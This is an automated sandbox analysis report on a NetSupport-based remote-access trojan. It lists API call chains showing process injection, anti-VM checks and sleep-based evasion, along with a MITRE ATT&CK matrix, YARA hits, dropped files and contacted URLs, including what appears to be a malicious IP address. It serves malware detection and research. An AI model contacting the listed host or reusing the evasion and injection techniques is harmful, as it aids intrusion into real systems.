                                Source: C:\Users\Public\Netstat\bild.exe TID: 6548Thread sleep time: -86250s >= -30000sJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exe TID: 4068Thread sleep time: -42000s >= -30000sJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exe TID: 6548Thread sleep time: -1984750s >= -30000sJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                Source: C:\Users\Public\Netstat\bild.exeLast function: Thread delayed
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF75AAB40BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF75AAB40BC
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF75AACB190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF75AACB190
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF75AADFCA0 FindFirstFileExA,0_2_00007FF75AADFCA0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,2_2_1102D330
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,2_2_11065890
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,2_2_1106A0A0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,2_2_111266E0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_1110AFD0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,2_2_1110AFD0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_6D080F84 _wstat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,2_2_6D080F84
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_6D07EFE1 _stat32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime32_t,free,__wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,2_2_6D07EFE1
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF75AAD16A4 VirtualQuery,GetSystemInfo,0_2_00007FF75AAD16A4
                                Source: HTCTL32.DLL.0.drBinary or memory string: VMware
                                Source: HTCTL32.DLL.0.drBinary or memory string: hbuf->datahttputil.c%5d000000000002004C4F4F50VirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTHmacaddr.cpp,%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZwhoa nelly, says Sherman, the Sharkhellooo nurse!kernel32.dllProcessIdToSessionId%s_L%d_%xNOT copied to diskcopied to %sAssert failed - Unhandled Exception (GPF) -
                                Source: TCCTL32.DLL.0.drBinary or memory string: skt%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllGetAdaptersInfoIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlTCREMOTETCBRIDGE%s=%s
                                Source: bild.exe, 00000002.00000003.2343788894.0000000005C0C000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000002.00000002.3888424181.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000002.00000002.3889718885.0000000005C0C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                Source: HTCTL32.DLL.0.drBinary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla
                                Source: TCCTL32.DLL.0.drBinary or memory string: VMWare
                                Source: bild.exe, 00000002.00000002.3888424181.0000000000EAE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP3
                                Source: C:\Users\Public\Netstat\bild.exeAPI call chain: ExitProcess graph end nodegraph_2-72422
                                Source: C:\Users\Public\Netstat\bild.exeAPI call chain: ExitProcess graph end nodegraph_2-73052
                                Source: C:\Users\Public\Netstat\bild.exeAPI call chain: ExitProcess graph end nodegraph_2-76546
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF75AAD3170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF75AAD3170
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_11147750 GetLastError,wsprintfA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,SetLastError,GetKeyState,2_2_11147750
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_6D0A6C74 VirtualProtect ?,-00000001,00000104,?2_2_6D0A6C74
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_11029590 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,2_2_11029590
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF75AAE0D20 GetProcessHeap,0_2_00007FF75AAE0D20
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF75AAD3354 SetUnhandledExceptionFilter,0_2_00007FF75AAD3354
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF75AAD2510 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF75AAD2510
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF75AAD3170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF75AAD3170
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF75AAD76D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF75AAD76D8
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_11093080 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,2_2_11093080
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_110310C0 _NSMClient32@8,SetUnhandledExceptionFilter,2_2_110310C0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_11161D01 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_11161D01
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_1116DD89 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_1116DD89
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_6D0AADFC _crt_debugger_hook,_memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,2_2_6D0AADFC
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_110F4560 GetTickCount,LogonUserA,GetTickCount,GetLastError,2_2_110F4560
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF75AACB190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF75AACB190
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_1111FCA0 GetForegroundWindow,GetClassNameA,GetWindowTextA,keybd_event,keybd_event,keybd_event,2_2_1111FCA0
                                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\Public\Netstat\bild.exe "C:\Users\Public\Netstat\bild.exe" Jump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_1109E190 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,_memset,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent,2_2_1109E190
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_1109E910 GetTokenInformation,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid,2_2_1109E910
                                Source: file.exe, 00000000.00000003.2039840028.0000027C558F7000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drBinary or memory string: Shell_TrayWndunhandled plugin data, id=%d
                                Source: file.exe, 00000000.00000003.2039840028.0000027C558F7000.00000004.00000020.00020000.00000000.sdmp, bild.exe, bild.exe, 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drBinary or memory string: Shell_TrayWnd
                                Source: file.exe, 00000000.00000003.2039840028.0000027C558F7000.00000004.00000020.00020000.00000000.sdmp, bild.exe, bild.exe, 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drBinary or memory string: Progman
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF75AABDC70 cpuid 0_2_00007FF75AABDC70
                                Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00007FF75AACA2CC
                                Source: C:\Users\Public\Netstat\bild.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,2_2_11173A35
                                Source: C:\Users\Public\Netstat\bild.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,2_2_11173D69
                                Source: C:\Users\Public\Netstat\bild.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,2_2_11173CC6
                                Source: C:\Users\Public\Netstat\bild.exeCode function: GetLocaleInfoA,2_2_1116B38E
                                Source: C:\Users\Public\Netstat\bild.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,2_2_11173933
                                Source: C:\Users\Public\Netstat\bild.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,2_2_111739DA
                                Source: C:\Users\Public\Netstat\bild.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_1117383E
                                Source: C:\Users\Public\Netstat\bild.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,2_2_11173D2D
                                Source: C:\Users\Public\Netstat\bild.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,2_2_11173C06
                                Source: C:\Users\Public\Netstat\bild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_110F33F0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeA,GetLastError,Sleep,CreateNamedPipeA,LocalFree,2_2_110F33F0
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF75AAD0754 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,MapViewOfFile,UnmapViewOfFile,CloseHandle,SetEnvironmentVariableW,GetLocalTime,swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,OleUninitialize,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF75AAD0754
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_1103B160 SHGetFolderPathA,GetUserNameA,DeleteFileA,_sprintf,_fputs,_free,GetFileAttributesA,SetFileAttributesA,2_2_1103B160
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_11174AE9 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,SetOaNoCache,2_2_11174AE9
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF75AAB4EB0 GetVersionExW,0_2_00007FF75AAB4EB0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_11070090 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,2_2_11070090
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 2_2_110D8200 __CxxThrowException@8,gethostbyname,WSAGetLastError,_memmove,htons,socket,WSAGetLastError,#21,bind,WSAGetLastError,listen,WSAGetLastError,accept,WSAGetLastError,2_2_110D8200
                                Source: Yara matchFile source: 2.2.bild.exe.6fbb0000.6.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 2.0.bild.exe.260000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 2.2.bild.exe.260000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 2.2.bild.exe.6f9d0000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 2.2.bild.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 2.2.bild.exe.6e080000.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.3.file.exe.27c55aa6820.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 2.2.bild.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000002.00000002.3888318749.0000000000262000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000002.00000002.3890657665.000000006E0C0000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000002.00000003.2343699674.0000000000F56000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000002.00000000.2041890788.0000000000262000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000002.00000002.3888424181.0000000000F75000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.2039840028.0000027C558F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6604, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: bild.exe PID: 5732, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\Public\Netstat\PCICHEK.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Users\Public\Netstat\pcicapi.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Users\Public\Netstat\bild.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\Public\Netstat\HTCTL32.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Users\Public\Netstat\TCCTL32.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Users\Public\Netstat\PCICL32.DLL, type: DROPPED
                                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                Gather Victim Identity InformationAcquire Infrastructure2
                                Valid Accounts
                                1
                                Windows Management Instrumentation
                                1
                                DLL Side-Loading
                                1
                                Exploitation for Privilege Escalation
                                1
                                Disable or Modify Tools
                                1
                                Input Capture
                                2
                                System Time Discovery
                                Remote Services1
                                Archive Collected Data
                                1
                                Ingress Tool Transfer
                                Exfiltration Over Other Network Medium1
                                System Shutdown/Reboot
                                CredentialsDomainsDefault Accounts4
                                Native API
                                2
                                Valid Accounts
                                1
                                DLL Side-Loading
                                1
                                Deobfuscate/Decode Files or Information
                                LSASS Memory1
                                Account Discovery
                                Remote Desktop Protocol1
                                Screen Capture
                                22
                                Encrypted Channel
                                Exfiltration Over Bluetooth1
                                Defacement
                                Email AddressesDNS ServerDomain Accounts2
                                Service Execution
                                1
                                Windows Service
                                2
                                Valid Accounts
                                3
                                Obfuscated Files or Information
                                Security Account Manager3
                                File and Directory Discovery
                                SMB/Windows Admin Shares1
                                Input Capture
                                3
                                Non-Application Layer Protocol
                                Automated ExfiltrationData Encrypted for Impact
                                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                                Access Token Manipulation
                                2
                                Software Packing
                                NTDS44
                                System Information Discovery
                                Distributed Component Object Model3
                                Clipboard Data
                                4
                                Application Layer Protocol
                                Traffic DuplicationData Destruction
                                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
                                Windows Service
                                1
                                DLL Side-Loading
                                LSA Secrets141
                                Security Software Discovery
                                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts13
                                Process Injection
                                1
                                Masquerading
                                Cached Domain Credentials2
                                Virtualization/Sandbox Evasion
                                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                                Valid Accounts
                                DCSync1
                                Process Discovery
                                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
                                Virtualization/Sandbox Evasion
                                Proc Filesystem11
                                Application Window Discovery
                                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                                Access Token Manipulation
                                /etc/passwd and /etc/shadow1
                                System Owner/User Discovery
                                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron13
                                Process Injection
                                Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                windows-stand
                                SourceDetectionScannerLabelLink
                                file.exe53%ReversingLabsWin64.Trojan.NetSupport
                                SourceDetectionScannerLabelLink
                                C:\Users\Public\Netstat\HTCTL32.DLL3%ReversingLabs
                                C:\Users\Public\Netstat\PCICHEK.DLL3%ReversingLabs
                                C:\Users\Public\Netstat\PCICL32.DLL12%ReversingLabs
                                C:\Users\Public\Netstat\TCCTL32.DLL3%ReversingLabs
                                C:\Users\Public\Netstat\bild.exe29%ReversingLabsWin32.Trojan.NetSupport
                                C:\Users\Public\Netstat\msvcr100.dll0%ReversingLabs
                                C:\Users\Public\Netstat\pcicapi.dll3%ReversingLabs
                                C:\Users\Public\Netstat\remcmdstub.exe13%ReversingLabs
                                No Antivirus matches
                                No Antivirus matches
                                SourceDetectionScannerLabelLink
                                http://www.symauth.com/rpa000%URL Reputationsafe
                                http://www.symauth.com/cps0(0%URL Reputationsafe
                                NameIPActiveMaliciousAntivirus DetectionReputation
                                geo.netsupportsoftware.com
                                172.67.68.212
                                truefalse
                                  unknown
                                  NameMaliciousAntivirus DetectionReputation
                                  http://geo.netsupportsoftware.com/location/loca.aspfalse
                                    unknown
                                    http://172.86.117.97/fakeurl.htmtrue
                                      unknown
                                      NameSourceMaliciousAntivirus DetectionReputation
                                      http://geo.netsupportsoftware.com/location/loca.aspSXbild.exe, 00000002.00000002.3888424181.0000000000F08000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        http://www.pci.co.uk/supportfile.exe, 00000000.00000003.2039840028.0000027C558F7000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drfalse
                                          unknown
                                          http://%s/testpage.htmwininet.dllbild.exe, 00000002.00000002.3890657665.000000006E0C0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.drfalse
                                            unknown
                                            http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)file.exe, 00000000.00000003.2039840028.0000027C558F7000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drfalse
                                              unknown
                                              http://www.pci.co.uk/supportsupportfile.exe, 00000000.00000003.2039840028.0000027C558F7000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drfalse
                                                unknown
                                                http://www.symauth.com/rpa00file.exe, 00000000.00000003.2039840028.0000027C55C7D000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://127.0.0.1RESUMEPRINTINGfile.exe, 00000000.00000003.2039840028.0000027C558F7000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drfalse
                                                  unknown
                                                  http://geo.netsupportsoftware.com/location/loca.asp/bild.exe, 00000002.00000002.3888424181.0000000000F08000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    unknown
                                                    http://%s/testpage.htmbild.exe, bild.exe, 00000002.00000002.3890657665.000000006E0C0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.drfalse
                                                      unknown
                                                      http://www.netsupportschool.com/tutor-assistant.asp11(file.exe, 00000000.00000003.2039840028.0000027C558F7000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drfalse
                                                        unknown
                                                        http://127.0.0.1bild.exe, bild.exe, 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drfalse
                                                          unknown
                                                          http://www.symauth.com/cps0(file.exe, 00000000.00000003.2039840028.0000027C55C7D000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.netsupportschool.com/tutor-assistant.aspfile.exe, 00000000.00000003.2039840028.0000027C558F7000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drfalse
                                                            unknown
